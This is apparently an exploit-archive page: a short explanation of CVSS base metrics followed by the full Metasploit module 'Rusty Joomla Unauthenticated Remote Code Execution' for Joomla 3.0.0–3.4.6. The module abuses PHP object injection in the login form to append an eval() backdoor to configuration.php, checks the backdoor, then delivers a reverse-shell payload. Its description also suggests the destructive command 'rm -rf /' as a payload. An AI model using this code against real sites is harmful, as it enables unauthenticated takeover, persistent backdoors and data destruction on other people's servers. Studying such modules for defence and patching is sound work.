The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
High
AC
The successful attack depends on the evasion or circumvention of security-enhancing techniques in place that would otherwise hinder the attack. These include: Evasion of exploit mitigation techniques. The attacker must have additional methods available to bypass security measures in place. For example, circumvention of address space randomization (ASLR) or data execution prevention must be performed for the attack to be successful. Obtaining target-specific secrets. The attacker must gather some target-specific secret before the attack can be successful. A secret is any piece of information that cannot be obtained through any amount of reconnaissance. To obtain the secret the attacker must perform additional attacks or break otherwise secure measures (e.g. knowledge of a secret key may be needed to break a crypto channel). This operation must be performed for each attacked target.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Rusty Joomla Unauthenticated Remote Code Execution
# Exploit Title: Joomla! 3.4.6 - Remote Code Execution (Metasploit)
# Google Dork: N/A
# Date: 2019-10-02
# Exploit Author: Alessandro Groppo
# Vendor Homepage: https//www.joomla.it/
# Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6
# Version: 3.0.0 --> 3.4.6
# Tested on: Linux
# CVE : N/A
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HTTP::Joomla
def initialize(info = {})
super(update_info(info,
'Name' => 'Rusty Joomla Unauthenticated Remote Code Execution',
'Description' => %q{
PHP Object Injection because of a downsize in the read/write process with the database leads to RCE.
The exploit will backdoor the configuration.php file in the root directory with en eval of a POST parameter.
That's because the exploit is more reliabale (doesn't rely on common disabled function).
For this reason, use it with caution and remember the house cleaning.
Btw, you can also edit this exploit and use whatever payload you want. just modify the exploit object with
get_payload('you_php_function','your_parameters'), e.g. get_payload('system','rm -rf /') and enjoy
},
'Author'=>
[
'Alessandro \'kiks\' Groppo @Hacktive Security',
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41'],
['URL', 'https://github.com/kiks7/rusty_joomla_rce']
],
'Privileged' => false,
'Platform' => 'PHP',
'Arch' => ARCH_PHP,
'Targets' => [['Joomla 3.0.0 - 3.4.6', {}]],
'DisclosureDate' => 'Oct 02 2019',
'DefaultTarget' => 0)
)
register_advanced_options(
[
OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),
])
end
def get_random_string(length=50)
source=("a".."z").to_a + ("A".."Z").to_a + (0..9).to_a
key=""
length.times{ key += source[rand(source.size)].to_s }
return key
end
def get_session_token
# Get session token from cookies
vprint_status('Getting Session Token')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
cook = res.headers['Set-Cookie'].split(';')[0]
vprint_status('Session cookie: ' + cook)
return cook
end
def get_csrf_token(sess_cookie)
vprint_status('Getting CSRF Token')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'/index.php/component/users'),
'headers' => {
'Cookie' => sess_cookie,
}
})
html = res.get_html_document
input_field = html.at('//form').xpath('//input')[-1]
token = input_field.to_s.split(' ')[2]
token = token.gsub('name="','').gsub('"','')
if token then
vprint_status('CSRF Token: ' + token)
return token
end
print_error('Cannot get the CSRF Token ..')
end
def get_payload(function, payload)
# @function: The PHP Function
# @payload: The payload for the call
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
# The http:// part is necessary in order to validate a condition in SimplePie::init and trigger the call_user_func with arbitrary values
payload = 'http://l4m3rz.l337/;' + payload
final = template.gsub('PAYLOAD',payload).gsub('LENGTH', payload.length.to_s).gsub('FUNC_NAME', function).gsub('FUNC_LEN', function.length.to_s)
return final
end
def get_payload_backdoor(param_name)
# return the backdoor payload
# or better, the payload that will inject and eval function in configuration.php (in the root)
# As said in other part of the code. we cannot create new .php file because we cannot use
# the ? character because of the check on URI schema
function = 'assert'
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
# This payload will append an eval() at the end of the configuration file
payload = "file_put_contents('configuration.php','if(isset($_POST[\\'"+param_name+"\\'])) eval($_POST[\\'"+param_name+"\\']);', FILE_APPEND) || $a=\'http://wtf\';"
template['PAYLOAD'] = payload
template['LENGTH'] = payload.length.to_s
template['FUNC_NAME'] = function
template['FUNC_LEN'] = function.length.to_s
return template
end
def check_by_exploiting
# Check that is vulnerable by exploiting it and try to inject a printr('something')
# Get the Session anb CidSRF Tokens
sess_token = get_session_token()
csrf_token = get_csrf_token(sess_token)
print_status('Testing with a POC object payload')
username_payload = '\\0\\0\\0' * 9
password_payload = 'AAA";'# close the prev object
password_payload += get_payload('print_r','IAMSODAMNVULNERABLE')# actual payload
password_payload += 's:6:"return":s:102:' # close cleanly the object
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path,'/index.php/component/users'),
'method' => 'POST',
'headers' =>
{
'Cookie' => sess_token,
},
'vars_post' => {
'username' => username_payload,
'password' => password_payload,
'option' => 'com_users',
'task' => 'user.login',
csrf_token => '1',
}
})
# Redirect in order to retrieve the output
if res.redirection then
res_redirect = send_request_cgi({
'method' => 'GET',
'uri' => res.redirection.to_s,
'headers' =>{
'Cookie' => sess_token
}
})
if 'IAMSODAMNVULNERABLE'.in? res.to_s or 'IAMSODAMNVULNERABLE'.in? res_redirect.to_s then
return true
else
return false
end
end
end
def check
# Check if the target is UP and get the current version running by info leak
res = send_request_cgi({'uri' => normalize_uri(target_uri.path, '/administrator/manifests/files/joomla.xml')})
unless res
print_error("Connection timed out")
return Exploit::CheckCode::Unknown
end
# Parse XML to get the version
if res.code == 200 then
xml = res.get_xml_document
version = xml.at('version').text
print_status('Identified version ' + version)
if version <= '3.4.6' and version >= '3.0.0' then
if check_by_exploiting()
return Exploit::CheckCode::Vulnerable
else
if check_by_exploiting() then
# Try the POC 2 times.
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
else
return Exploit::CheckCode::Safe
end
else
print_error('Cannot retrieve XML file for the Joomla Version. Try the POC in order to confirm if it\'s vulnerable')
if check_by_exploiting() then
return Exploit::CheckCode::Vulnerable
else
if check_by_exploiting() then
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
end
end
def exploit
if check == Exploit::CheckCode::Safe && !datastore['FORCE']
print_error('Target is not vulnerable')
return
end
pwned = false
cmd_param_name = get_random_string(50)
sess_token = get_session_token()
csrf_token = get_csrf_token(sess_token)
# In order to avoid problems with disabled functions
# We are gonna append an eval() function at the end of the configuration.php file
# This will not cause any problem to Joomla and is a good way to execute then PHP directly
# cuz assert is toot annoying and with conditions that we have we cannot inject some characters
# So we will use 'assert' with file_put_contents to append the string. then create a reverse shell with this backdoor
# Oh i forgot, We cannot create a new file because we cannot use the '?' character in order to be interpreted by the web server.
# TODO: Add the PHP payload object to inject the backdoor inside the configuration.php file
# Use the implanted backdoor to receive a nice little reverse shell with a PHP payload
# Implant the backdoor
vprint_status('Cooking the exploit ..')
username_payload = '\\0\\0\\0' * 9
password_payload = 'AAA";'# close the prev object
password_payload += get_payload_backdoor(cmd_param_name)# actual payload
password_payload += 's:6:"return":s:102:' # close cleanly the object
print_status('Sending exploit ..')
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path,'/index.php/component/users'),
'method' => 'POST',
'headers' => {
'Cookie' => sess_token
},
'vars_post' => {
'username' => username_payload,
'password' => password_payload,
'option' => 'com_users',
'task' => 'user.login',
csrf_token => '1'
}
})
print_status('Triggering the exploit ..')
if res.redirection then
res_redirect = send_request_cgi({
'method' => 'GET',
'uri' => res.redirection.to_s,
'headers' =>{
'Cookie' => sess_token
}
})
end
# Ping the backdoor see if everything is ok :/
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'configuration.php'),
'vars_post' => {
cmd_param_name => 'echo \'PWNED\';'
}
})
if res.to_s.include? 'PWNED' then
print_status('Target P0WN3D! eval your code at /configuration.php with ' + cmd_param_name + ' in a POST')
print_status('Now it\'s time to reverse shell')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'configuration.php'),
'vars_post' => {
cmd_param_name => payload.encoded
}
})
end
end
end
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum